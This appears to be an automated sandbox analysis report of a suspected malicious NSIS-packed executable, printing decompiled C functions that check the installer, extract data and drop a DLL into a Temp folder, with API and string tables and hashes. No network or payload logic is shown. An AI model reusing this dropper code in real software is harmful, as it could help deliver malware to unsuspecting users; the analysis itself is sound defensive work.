				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\frontdesk\\Desktop";
				E00405B98("C:\\Users\\frontdesk\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x2b400
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x2b400
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x2b400
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x2b400
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                0x00402c5d
                0x00402c60
                0x00402c63
                0x00402c66
                0x00402c6c
                0x00402c7d
                0x00402c82
                0x00402c95
                0x00402c9a
                0x00402c9d
                0x00402ca3
                0x00000000
                0x00402ca5
                0x00402cb0
                0x00402cb6
                0x00402cc7
                0x00402cce
                0x00402cd4
                0x00402cd6
                0x00402cdb
                0x00402cdd
                0x00402dca
                0x00402dcc
                0x00402dd1
                0x00402dd8
                0x00000000
                0x00000000
                0x00402dda
                0x00402ddd
                0x00402e01
                0x00402e06
                0x00402e0c
                0x00402e0e
                0x00402e17
                0x00402e1c
                0x00402e1f
                0x00402e20
                0x00402e21
                0x00402e23
                0x00402e28
                0x00402e2b
                0x00402e3e
                0x00402e42
                0x00402e4a
                0x00402e4f
                0x00402e51
                0x00402e51
                0x00402e51
                0x00402e59
                0x00402e59
                0x00402e5c
                0x00402e5d
                0x00402e5d
                0x00402e60
                0x00402e62
                0x00402e62
                0x00402e62
                0x00402e6c
                0x00402e72
                0x00402e80
                0x00402e85
                0x00000000
                0x00402e85
                0x00000000
                0x00402e2b
                0x00402de5
                0x00402df0
                0x00402df5
                0x00402df7
                0x00000000
                0x00000000
                0x00402dfc
                0x00402dff
                0x00000000
                0x00000000
                0x00000000
                0x00402ce3
                0x00402ce8
                0x00402ce8
                0x00402ced
                0x00402cf1
                0x00402cf8
                0x00402cfd
                0x00402cff
                0x00402d01
                0x00402d01
                0x00402d05
                0x00402d0a
                0x00402d0c
                0x00402e36
                0x00402e2d
                0x00000000
                0x00402e2d
                0x00402d12
                0x00402d19
                0x00402d95
                0x00402d99
                0x00402d9d
                0x00402da2
                0x00000000
                0x00402d99
                0x00402d22
                0x00402d27
                0x00402d2a
                0x00402d2f
                0x00000000
                0x00000000
                0x00402d31
                0x00402d38
                0x00000000
                0x00000000
                0x00402d3a
                0x00402d41
                0x00000000
                0x00000000
                0x00402d43
                0x00402d4a
                0x00000000
                0x00000000
                0x00402d4c
                0x00402d53
                0x00000000
                0x00000000
                0x00402d55
                0x00402d5b
                0x00402d64
                0x00402d6a
                0x00402d6d
                0x00402d6f
                0x00402d75
                0x00000000
                0x00000000
                0x00402d7b
                0x00402d7f
                0x00402d87
                0x00402d87
                0x00402d8a
                0x00402d8d
                0x00402d8f
                0x00402d91
                0x00402d91
                0x00000000
                0x00402d8f
                0x00402d81
                0x00402d85
                0x00000000
                0x00000000
                0x00000000
                0x00402da3
                0x00402da3
                0x00402da9
                0x00402db5
                0x00402db5
                0x00402db8
                0x00402dbe
                0x00402dc0
                0x00402dc0
                0x00402dc8
                0x00402dc8
                0x00000000
                0x00402dc8

                APIs
                • GetTickCount.KERNEL32 ref: 00402C66
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RHK098760045678009000.exe,00000400), ref: 00402C82
                  • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 00405873
                  • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RHK098760045678009000.exe,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 00402CCE
                Strings
                • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C5F
                • Null, xrefs: 00402D4C
                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                • pA, xrefs: 00402CE3
                • C:\Users\user\Desktop\RHK098760045678009000.exe 0, xrefs: 00402C55
                • Error launching installer, xrefs: 00402CA5
                • C:\Users\user\Desktop\RHK098760045678009000.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                • soft, xrefs: 00402D43
                • Inst, xrefs: 00402D3A
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesCountCreateModuleNameSizeTick
                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RHK098760045678009000.exe$C:\Users\user\Desktop\RHK098760045678009000.exe 0$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                • API String ID: 4283519449-868404052
                • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\FRONTD~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\FRONTD~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                0x00401751
                0x00401758
                0x00401761
                0x00401764
                0x00401767
                0x0040176c
                0x00401774
                0x00401790
                0x00401776
                0x00401776
                0x00401777
                0x00401777
                0x00401796
                0x004017a0
                0x004017a0
                0x004017a4
                0x004017a7
                0x004017ac
                0x004017ae
                0x004017b0
                0x004017b5
                0x004017b5
                0x004017c0
                0x004017c0
                0x004017d1
                0x004017d3
                0x004017d3
                0x004017d4
                0x004017d4
                0x004017d7
                0x004017da
                0x004017dd
                0x004017dd
                0x004017e4
                0x004017f3
                0x004017f8
                0x004017fb
                0x004017fe
                0x00000000
                0x00000000
                0x00401800
                0x00401803
                0x0040185d
                0x00401862
                0x004015a8
                0x0040268f
                0x0040268f
                0x004028be
                0x004028c1
                0x004028c1
                0x00000000
                0x00401805
                0x0040180b
                0x00401816
                0x00401823
                0x0040182e
                0x00401844
                0x00401844
                0x00401847
                0x00000000
                0x0040184d
                0x0040184d
                0x0040184e
                0x0040186b
                0x004028c7
                0x004028c7
                0x004028c7
                0x00401850
                0x00401850
                0x00401851
                0x00401492
                0x00402241
                0x00402241
                0x00402241
                0x0040184e
                0x00401847
                0x004028c9
                0x004028cd
                0x004028cd
                0x0040187b
                0x00401880
                0x00401886
                0x00401887
                0x00401888
                0x0040188b
                0x0040188e
                0x00401893
                0x00401899
                0x0040189d
                0x0040189f
                0x004018a7
                0x004018b3
                0x004018a1
                0x004018a1
                0x004018a5
                0x00000000
                0x00000000
                0x004018a5
                0x004018bc
                0x004018c2
                0x004018c4
                0x00000000
                0x004018ca
                0x004018ca
                0x004018cd
                0x004018e5
                0x004018cf
                0x004018d2
                0x004018db
                0x004018db
                0x004018ea
                0x004018ef
                0x0040223c
                0x00000000
                0x0040223c
                0x00000000

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,ymvwfuvwx,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                • CompareFileTime.KERNEL32(-00000014,?,ymvwfuvwx,ymvwfuvwx,00000000,00000000,ymvwfuvwx,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                  • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,aufce Setup,NSIS Error), ref: 00405BA5
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp$C:\Users\user~1\AppData\Local\Temp\nsv5920.tmp\fbnwl.dll$ymvwfuvwx
                • API String ID: 1941528284-3975105240
                • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x2cb32
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                0x00402e96
                0x00402e9a
                0x00402e9d
                0x00402ea2
                0x00402ea4
                0x00402ea4
                0x00402eab
                0x00402eaf
                0x00402eb3
                0x00402eb5
                0x00402eb5
                0x00402eba
                0x00402ebf
                0x00402ec1
                0x00402eca
                0x00402eca
                0x00402ed5
                0x00402edc
                0x0040302c
                0x0040302c
                0x00000000
                0x00402ee2
                0x00402ee6
                0x00403017
                0x0040306c
                0x00403031
                0x00403037
                0x00403039
                0x00403039
                0x0040304a
                0x00000000
                0x0040304c
                0x0040305f
                0x00403011
                0x00403011
                0x0040302e
                0x0040302e
                0x00000000
                0x00403066
                0x00403066
                0x00403069
                0x00000000
                0x00403069
                0x0040305f
                0x0040304a
                0x00403077
                0x00000000
                0x00403077
                0x0040301c
                0x0040301e
                0x0040301e
                0x0040302a
                0x00403074
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040302a
                0x00402ef7
                0x00402efa
                0x00402eff
                0x00402eff
                0x00402f09
                0x00402f0c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402f12
                0x00402f12
                0x00402f12
                0x00402f1a
                0x00402f1c
                0x00402f1c
                0x00402f2d
                0x00000000
                0x00000000
                0x00402f33
                0x00402f36
                0x00402f3c
                0x00402f42
                0x00402f4a
                0x00402f50
                0x00402f55
                0x00402f5c
                0x00402f5f
                0x00000000
                0x00000000
                0x00402f65
                0x00402f6b
                0x00402f6d
                0x00402f7a
                0x00402f7c
                0x00402faa
                0x00402fb0
                0x00402fb9
                0x00402fbe
                0x00402fbe
                0x00402fc5
                0x00403005
                0x00000000
                0x00000000
                0x00000000
                0x00402fc7
                0x00402fca
                0x00402fea
                0x00402fed
                0x00402ff0
                0x00402ff6
                0x00402ffa
                0x00000000
                0x00000000
                0x00000000
                0x00403000
                0x00402fd6
                0x00402fde
                0x00000000
                0x00402fe5
                0x00402fe5
                0x00000000
                0x00402fe5
                0x00402fde
                0x00402fc5
                0x0040300d
                0x00000000
                0x0040300d
                0x00000000
                0x00402f12

                APIs
                • GetTickCount.KERNEL32 ref: 00402EEC
                • GetTickCount.KERNEL32 ref: 00402F6D
                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                • wsprintfA.USER32 ref: 00402FAA
                • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountTick$FileWritewsprintf
                • String ID: ... %d%%
                • API String ID: 4209647438-2449383134
                • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                0x00405351
                0x00405355
                0x00405358
                0x0040535e
                0x00405362
                0x00405366
                0x0040536e
                0x00405375
                0x0040537b
                0x00405382
                0x00405389
                0x00405391
                0x00405393
                0x00000000
                0x00405393
                0x0040539d
                0x004053a4
                0x004053ba
                0x00000000
                0x00000000
                0x00000000
                0x004053bc
                0x004053c0

                APIs
                • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                • GetLastError.KERNEL32 ref: 0040539D
                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                • GetLastError.KERNEL32 ref: 004053BC
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\Desktop$Ls@$\s@
                • API String ID: 3449924974-621692704
                • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
